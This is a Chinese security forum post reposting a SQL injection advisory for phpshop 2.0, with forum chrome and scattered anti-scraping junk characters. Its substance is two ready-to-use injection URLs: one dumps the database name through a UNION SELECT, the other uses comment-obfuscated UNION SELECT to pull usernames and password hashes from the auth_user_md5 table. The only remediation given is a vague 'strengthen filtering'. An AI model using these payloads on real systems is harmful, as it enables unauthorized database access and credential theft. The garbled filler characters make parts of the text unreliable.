找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2309|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability
3 a8 Y& W, t  Y  o4 A+ D
' O7 Q! D& z- J( Z, z# l7 a作者 : By onestree
/ l* V2 Y  C7 P; f5 @下载地址 : http://code.google.com/p/phpshop/downloads/list
4 Q2 r4 F9 O/ z% M测试地址: windows 7 / ubuntu0 v7 n# V! B0 {2 t

! v( c1 h2 b2 R' t- ]3 Z % D) S9 D' |8 `" Z/ g) e$ N' ~
SQLi p0c:
, V0 q: ?" i  b8 m
  h" g# O. p  Q) e9 W7 L==================9 J8 @$ N6 d) y3 f" e$ x

- k" C8 j$ |; Ihttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
4 D/ d+ S4 |. W7 R' q4 X5 O6 sunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
& F* k+ j8 y* o. Y / Y& F# x0 _# l+ a. j" `
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--% P% S( h* ?: v& ?& H

: d1 V: H- r( D# b& i# b9 R修复:9 u7 {0 p0 M2 u8 P. [/ V) L
加强过滤
7 l6 W' I6 u* O) f. D7 O) E
3 C; ^8 M1 F# R7 w4 F4 H4 O+ W" u5 f$ _- h% B; k1 i( g$ r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表